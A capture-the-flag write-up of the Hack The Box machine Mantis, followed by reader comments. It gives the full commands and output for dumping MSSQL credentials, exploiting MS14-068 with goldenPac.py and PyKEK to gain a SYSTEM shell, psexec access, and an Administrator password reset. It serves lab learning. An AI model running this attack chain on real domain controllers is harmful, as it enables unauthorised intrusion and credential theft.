Mantis write-up by Alamot

Enumeration

Port scanning

We scan the full range of TCP ports using nmap:

$ sudo nmap -T4 -A -p- 10.10.10.52

PORT      STATE    SERVICE      VERSION
53/tcp    open     domain       Microsoft DNS 6.1.7601
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/tcp    open     kerberos-sec Microsoft Windows Kerberos (server time: 2017-09-17 08:05:01Z)
135/tcp   open     msrpc        Microsoft Windows RPC
139/tcp   open     netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open     ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open     microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp   open     kpasswd5?
593/tcp   open     ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open     tcpwrapped
738/tcp   filtered unknown
1337/tcp  open     http         Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
1361/tcp  filtered linx
1433/tcp  open     ms-sql-s     Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info: 
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: MANTIS
|   DNS_Domain_Name: htb.local
|   DNS_Computer_Name: mantis.htb.local
|   DNS_Tree_Name: htb.local
|_  Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2017-09-16T19:03:50
|_Not valid after:  2047-09-16T19:03:50
|_ssl-date: 2017-09-17T08:06:17+00:00; +2s from scanner time.
3268/tcp  open     ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open     tcpwrapped
3734/tcp  filtered synel-data
4461/tcp  filtered unknown
5722/tcp  open     msrpc        Microsoft Windows RPC
7511/tcp  filtered pafec-lm
8080/tcp  open     http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Tossed Salad - Blog
9389/tcp  open     mc-nmf       .NET Message Framing
9484/tcp  filtered unknown
9725/tcp  filtered unknown
11126/tcp filtered unknown
11628/tcp filtered unknown
13100/tcp filtered unknown
13703/tcp filtered unknown
19797/tcp filtered unknown
29664/tcp filtered unknown
34288/tcp filtered unknown
35536/tcp filtered unknown
37108/tcp filtered unknown
47001/tcp open     http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open     msrpc        Microsoft Windows RPC
49153/tcp open     msrpc        Microsoft Windows RPC
49155/tcp open     msrpc        Microsoft Windows RPC
49156/tcp open     msrpc        Microsoft Windows RPC
49157/tcp open     ncacn_http   Microsoft Windows RPC over HTTP 1.0
49158/tcp open     msrpc        Microsoft Windows RPC
49162/tcp open     msrpc        Microsoft Windows RPC
49289/tcp filtered unknown
50010/tcp open     msrpc        Microsoft Windows RPC
50017/tcp open     msrpc        Microsoft Windows RPC
50255/tcp open     unknown
53029/tcp filtered unknown
55718/tcp filtered unknown
56870/tcp filtered unknown
57167/tcp filtered unknown

No exact OS matches for host 

Network Distance: 2 hops
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
| ms-sql-info: 
|   10.10.10.52:1433: 
|     Version: 
|       name: Microsoft SQL Server 2014 RTM
|       number: 12.00.2000.00
|       Product: Microsoft SQL Server 2014
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb-os-discovery: 
|   OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: mantis
|   NetBIOS computer name: MANTIS\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: mantis.htb.local
|_  System time: 2017-09-17T04:06:21-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
|_smbv2-enabled: Server supports SMBv2 protocol

We scan only the 1000 most common UDP ports using nmap (because UDP scanning is too slow):

$ sudo nmap -T4 -sU -A --top-ports=1000 10.10.10.52

PORT      STATE         SERVICE        VERSION
9/udp     open|filtered discard
53/udp    open          domain         Microsoft DNS
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/udp    open          kerberos-sec   Microsoft Windows Kerberos (server time: 2017-09-17 08:47:35Z)
123/udp   open          ntp            NTP v3
| ntp-info: 
|_  
137/udp   open|filtered netbios-ns
138/udp   open|filtered netbios-dgm
389/udp   open          lhwclock --systohcdap           Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
464/udp   open|filtered kpasswd5
500/udp   open|filtered isakmp
4500/udp  open|filtered nat-t-ike
5355/udp  open|filtered llmnr
17146/udp open|filtered unknown
20359/udp open|filtered unknown
20742/udp open|filtered unknown
32771/udp open|filtered sometimes-rpc6
49198/udp open|filtered unknown
52144/udp open          domain         Zoom X5 ADSL modem DNS
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
52225/udp open          domain         Microsoft DNS
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
52503/udp open          domain         Microsoft DNS
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
53006/udp open          domain         Microsoft DNS
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
53037/udp open          domain         Microsoft DNS
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
53571/udp open          domain         Microsoft DNS
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
53589/udp open          domain         Microsoft DNS
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
53838/udp open          domain         Microsoft DNS
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
54094/udp open          domain         Microsoft DNS
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
54114/udp open          domain         Microsoft DNS
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
54281/udp open          domain         Microsoft DNS
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
54321/udp open          domain         Microsoft DNS
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)

Too many fingerprints match this host to give specific OS details

Service Info: Host: MANTIS; OS: Windows; Device: broadband router; CPE: cpe:/o:microsoft:windows_server, cpe:/o:microsoft:windows, cpe:/h:zoom:x5

Host script results:
|_clock-skew: mean: 8s, deviation: 0s, median: 8s

Brute forcing directories and files

$ dirsearch -u http://10.10.10.52:1337 -w /opt/DirBuster/directory-list-2.3-medium.txt -e asp

Extensions: asp | Threads: 10 | Wordlist size: 220521

Target: http://10.10.10.52:1337

[09:17:59] Starting: 
[09:18:00] 200 -  689B  - /
[09:30:17] 500 -    3KB - /orchard
[10:06:05] 301 -  160B  - /secure_notes  ->  http://10.10.10.52:1337/secure_notes/
$ dirsearch -u http://10.10.10.52:8080 -w /opt/DirBuster/directory-list-2.3-medium.txt -e asp

Target: http://10.10.10.52:8080

[10:14:28] Starting: 
[10:14:50] 200 -    6KB - /
[10:15:13] 200 -    3KB - /archive
[10:16:15] 200 -    3KB - /blogs
[10:17:07] 302 -  163B  - /admin  ->  /Users/Account/AccessDenied?ReturnUrl=%2Fadmin
[10:21:05] 200 -    2KB - /tags
[10:27:23] 200 -    3KB - /Archive
[10:32:18] 200 -    3KB - /pollArchive
[10:40:06] 200 -    3KB - /Blogs
[10:45:24] 200 -    3KB - /newsarchive
[10:54:36] 200 -    3KB - /news_archive
[11:18:17] 302 -  163B  - /Admin  ->  /Users/Account/AccessDenied?ReturnUrl=%2FAdmin

Let’s visit http://10.10.10.52:1337/secure_notes/

10.10.10.52 - /secure_notes/
[To Parent Directory]

 9/13/2017  4:22 PM          912 dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt
  9/1/2017  9:13 AM          168 web.config

http://10.10.10.52:1337/secure_notes/dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt
1. Download OrchardCMS
2. Download SQL server 2014 Express ,create user "admin",and create orcharddb database
3. Launch IIS and add new website and point to Orchard CMS folder location.
4. Launch browser and navigate to http://localhost:8080
5. Set admin password and configure sQL server connection string.
6. Add blog pages with admin user.

The filename dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt seems to contain some base64-encoded text. Let’s explore it:

$ echo NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx | base64 -d
6d2424716c5f53405f504073735730726421

This seems like a hex string. Let’s convert it to ASCII:

$ echo 6d2424716c5f53405f504073735730726421 | xxd -r -p
m$$ql_S@_P@ssW0rd!

Bingo! We found an MSSQL password. Let’s test it using the username “admin”.

Exploring MSSQL databases

Using Impacket (mssqlclient.py)

mssqlclient.py -p 1433 admin:m\$\$ql_S@_P@ssW0rd\!@10.10.10.52
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (120 7208) 
[!] Press help for extra shell commands
SQL> SELECT name FROM master.dbo.sysdatabases
master                                                                                                               tempdb                                                                                                               
model                                                                                                                
msdb         
orcharddb 

SQL> SELECT COLUMN_NAME 'All_Columns' FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='User' 
blog_Orchard_Users_UserPartRecord                                                                                     
blog_Orchard_Roles_UserRolesPartRecord 

SQL> use orcharddb
SQL> SELECT COLUMN_NAME 'All_Columns' FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='blog_Orchard_Users_UserPartRecord '
Id                                                                                                                    
UserName                                                                                                             
Email                                                                                                                
NormalizedUserName                                                                                                   
Password                                                                                                             
PasswordFormat                                                                                                       
HashAlgorithm                                                                                                        
PasswordSalt                                                                                                         
RegistrationStatus                                                                                                   
EmailStatus                                                                                                          
EmailChallengeToken                                                                                                  
CreatedUtc                                                                                                            
LastLoginUtc                                                                                                         
LastLogoutUtc 

SQL> select UserName,Password from blog_Orchard_Users_UserPartRecord 
admin
AL1337E2D6YHm0iIysVzG8LA76OozgMSlyOJk1Ov5WCGK+lgKY6vrQuswfWHKZn2+A==
James
J@m3s_P@ssW0rd!

Using Metasploit

$ msfconsole
msf > use auxiliary/admin/mssql/mssql_findandsampledata
msf auxiliary(mssql_findandsampledata) > set USERNAME admin
msf auxiliary(mssql_findandsampledata) > set PASSWORD m$$ql_S@_P@ssW0rd!
msf auxiliary(mssql_findandsampledata) > set SAMPLE_SIZE 10

  Name                 Current Setting     Required  Description
  ----                 ---------------     --------  -----------
  KEYWORDS             passw|credit|card   yes       Keywords to search for
  PASSWORD             m$$ql_S@_P@ssW0rd!  no        The password for the specified username
  RHOSTS               10.10.10.52         yes       The target address range or CIDR identifier
  RPORT                1433                yes       The target port (TCP)
  SAMPLE_SIZE          10                  yes       Number of rows to sample
  TDSENCRYPTION        false               yes       Use TLS/SSL for TDS data "Force Encryption"
  THREADS              1                   yes       The number of concurrent threads
  USERNAME             admin               no        The username to authenticate as
  USE_WINDOWS_AUTHENT  false               yes       Use windows authentification (requires DOMAIN option set)

msf auxiliary(mssql_findandsampledata) > exploit

[*] 10.10.10.52:1433 - Attempting to connect to the SQL Server at 10.10.10.52:1433...
[*] 10.10.10.52:1433 - Successfully connected to 10.10.10.52:1433
[*] 10.10.10.52:1433 - Attempting to retrieve data ...
[*] 10.10.10.52:1433 - MANTIS\\SQLEXPRESS, orcharddb, ..., Password, nvarchar, AL1337E2D6YHm0iIysVzG8LA76Oozg, 2                             
[*] 10.10.10.52:1433 - MANTIS\\SQLEXPRESS, orcharddb, ..., Password, nvarchar, J@m3s_P@ssW0rd!               , 2                             
[*] 10.10.10.52:1433 - MANTIS\\SQLEXPRESS, orcharddb, ..., PasswordSalt, nvarchar, NA                            , 2                             
[*] 10.10.10.52:1433 - MANTIS\\SQLEXPRESS, orcharddb, ..., PasswordSalt, nvarchar, UBwWF1CQCsaGc/P7jIR/kg==      , 2                             
[*] 10.10.10.52:1433 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Exploiting Kerberos

We have found some credentials (james:J@m3s_P@ssW0rd!) in the MSSQL orcharddb. Let’s use them to exploit Kerberos:

Using Impacket (goldenPac.py)

Add these lines to /etc/hosts

10.10.10.52 mantis.htb.local
10.10.10.52 htb.local

Now let’s run goldenPac.py:

$ goldenPac.py htb.local/james:J@m3s_P@ssW0rd\!@mantis.htb.local

Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies

[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
[*] Forest SID: S-1-5-21-4220043660-4019079961-2895681657
[*] Attacking domain controller mantis.htb.local
[*] mantis.htb.local found vulnerable!
[*] Requesting shares on mantis.htb.local.....
[*] Found writable share ADMIN$
[*] Uploading file hgjtJStu.exe
[*] Opening SVCManager on mantis.htb.local.....
[*] Creating service rQic on mantis.htb.local.....
[*] Starting service rQic.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> whoami
nt authority\system

Using PyKEK i.e. Python Kerberos Exploitation Kit (ms14-068.py)

Add these lines to /etc/hosts

10.10.10.52 mantis.htb.local
10.10.10.52 htb.local

Add this line to /etc/resolv.conf

nameserver 10.10.10.52

Get USER_SID using rpcclient:

$ rpcclient -U james 10.10.10.52
Enter james's password: J@m3s_P@ssW0rd!
rpcclient $> lookupnames james
james S-1-5-21-4220043660-4019079961-2895681657-1103

Create the ticket and copy it into the proper location:

$ git clone https://github.com/bidord/pykek && cd pykek
$ python2 ms14-068.py -u james@htb.local -s S-1-5-21-4220043660-4019079961-2895681657-1103 -d mantis.htb.local
Password:J@m3s_P@ssW0rd!

$ cp TGT_james@htb.local.ccache /tmp/krb5cc_$(echo $UID)

Connect using smbclient:

$ smbclient -k -U james \\\\mantis.htb.local\\C$

OS=[Windows Server 2008 R2 Standard 7601 Service Pack 1] Server=[Windows Server 2008 R2 Standard 6.1]
smb: \> more \USERS\Administrator\DESKTOP\root.txt
209dc756ee5c09a9967540fe18d15567

A word of advice

If Kerberos does not work as expected, make sure that you have added the proper lines in /etc/hosts and /etc/resolv.conf (and -of course- check the kerberos configuration files if you use them).

Notice that kinit seems to need UPPERCASE letters for the domain in order to work correctly. Compare the following different results:

$ kinit -V james@htb.local
Using default cache: /tmp/krb5cc_1000
Using principal: james@htb.local
Password for james@htb.local: J@m3s_P@ssW0rd!
kinit: KDC reply did not match expectations while getting initial credentials

$ kinit -V james@HTB.LOCAL
Using default cache: /tmp/krb5cc_1000
Using principal: james@HTB.LOCAL
Password for james@HTB.LOCAL: J@m3s_P@ssW0rd!
Authenticated to Kerberos v5

BONUS: Exploitation using left behind services

Look Mom! No need for kerberos exploit! :smiley:

$ psexec.py htb.local/james:J@m3s_P@ssW0rd\!@mantis.htb.local
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies

[*] Trying protocol 445/SMB...
[*] Requesting shares on mantis.htb.local.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'SYSVOL' is not writable.
[*] Uploading file VdYFkBHZ.exe
[-] Error uploading file VdYFkBHZ.exe, aborting.....
[-] Error performing the installation, cleaning up: 'NoneType' object has no attribute 'split'
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]

Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
nt authority\system

We got some errors, but it worked! Maybe we have access to a writable share after all…

$ smbmap.py -u james -p J@m3s_P@ssW0rd\! -H mantis.htb.local
[+] Finding open SMB ports....
[+] User SMB session establishd on mantis.htb.local...
[+] IP: mantis.htb.local:445	Name: mantis.htb.local                                  
    Disk                                                Permissions
    ----                                                -----------
    ADMIN$                                              NO ACCESS
    C$                                                  NO ACCESS
    IPC$                                                NO ACCESS
    NETLOGON                                            READ ONLY
    SYSVOL                                              READ ONLY

No. We don’t have access to a writable share. This is very strange. How did we get nt authority\system shell? I decided to open an issue on the github: How is this possible? nt system shell without writable shares · Issue #346 · fortra/impacket · GitHub

It seems that psexec.py is connecting to a previous RemComSvc instance that is still running in the target system. The need for a writeable share is only for copying the RemComSvc Windows Service file. Once it is running, all communication is done through Windows Named Pipes.

I changed the password for the administrator account to make it easier to explore the issue:

C:\Windows\system32> net user Administrator P@ssw0rd

We can use Impacket (services.py) to list the services. We look for services named using four random uppercase letters. Moreover, their executable file should be named using eight random mixed case letters and its path should be inside C:\Windows\ :

services.py htb.local/administrator:P@ssw0rd@mantis.htb.local list

...
IHXM -                                                                   IHXM -  RUNNING
...
TZZW -                                                                   TZZW -  RUNNING
...


$ services.py htb.local/administrator:P@ssw0rd@mantis.htb.local config -name IHXM
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies

[*] Trying protocol 445/SMB...
[*] Querying service config for IHXM
TYPE              : 16 -  SERVICE_WIN32_OWN_PROCESS  
START_TYPE        :  2 -  AUTO START
ERROR_CONTROL     :  0 -  IGNORE
BINARY_PATH_NAME  : C:\Windows\dZEyLGVN.exe
LOAD_ORDER_GROUP  : 
TAG               : 0
DISPLAY_NAME      : IHXM
DEPENDENCIES      : /

$ services.py htb.local/administrator:P@ssw0rd@mantis.htb.local config -name TZZW
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies

[*] Trying protocol 445/SMB...
[*] Querying service config for TZZW
TYPE              : 16 -  SERVICE_WIN32_OWN_PROCESS  
START_TYPE        :  2 -  AUTO START
ERROR_CONTROL     :  0 -  IGNORE
BINARY_PATH_NAME  : C:\Windows\EfuIvklz.exe
LOAD_ORDER_GROUP  : 
TAG               : 0
DISPLAY_NAME      : TZZW
DEPENDENCIES      : /
SERVICE_START_NAME: LocalSystem

Now, let’s try to stop those two services and check if psexec still works as before:

$ services.py htb.local/administrator:P@ssw0rd@mantis.htb.local stop -name IHXM
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies

[*] Trying protocol 445/SMB...
[*] Stopping service IHXM

$ services.py htb.local/administrator:P@ssw0rd@mantis.htb.local stop -name TZZW
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies

[*] Trying protocol 445/SMB...
[*] Stopping service TZZW

$ psexec.py htb.local/james:J@m3s_P@ssW0rd\!@mantis.htb.local
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies

[*] Trying protocol 445/SMB...

[*] Requesting shares on mantis.htb.local.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'SYSVOL' is not writable.
[*] Uploading file ysSjUyKc.exe
[-] Error uploading file ysSjUyKc.exe, aborting.....
[-] Error performing the installation, cleaning up: 'NoneType' object has no attribute 'split'

Yup, it doesn’t work anymore. This confirms that those two services were responsible for the previous behaviour. But how those services were installed on the box in the first place? I don’t know. Probably, during the testing phase, some pentester tried to use psexec.py. If -for any reason- the cleaning up phase of the tool failed, it left behind those services. :slight_smile:

awesome !

great write-up!

That is an excellent write-up, I spent hours with KEK and smbclient struggling with the syntax. GoldenPac looks like it made that part easy :astonished:.

funny i’ve never managed to get goldenPac.py to work although smbexec.py got me there… great WU, thanks

I’m having an issue with both smb and kinit. I get the error message “kinit: Cannot find KDC for realm “HTB.LOCAL” while getting initial credentials”. I’ve double, triple checked and i’ve made the right changes to both hosts and resolv.conf. Any help appreciated! The smb error I get is “SPNEGO: Could not find a suitable mechtype in NEG_TOKEN_INIT”. Thanks

is Resolv.conf getting overwritten? It took me 2+ hrs and looking at Wireshark and d 3 verbose in smbclient for me to get EVERYTHING right to work.

Sorry.I have a question.
How could we know james can logon in the sever use pyexec?
Thanks!

@ponder We didn’t know it. We found it by trying.

@alamot said:
@ponder We didn’t know it. We found it by trying.

Ohhhhh.Thank you so much.

someone has encountered this error in impacket mssqlclient
[*] Encryption required, switching to TLS
[-] [(‘SSL routines’, ‘ssl_cipher_list_to_bytes’, ‘no ciphers available’)]

I tried adding more ciphers within the tds.py code, but without success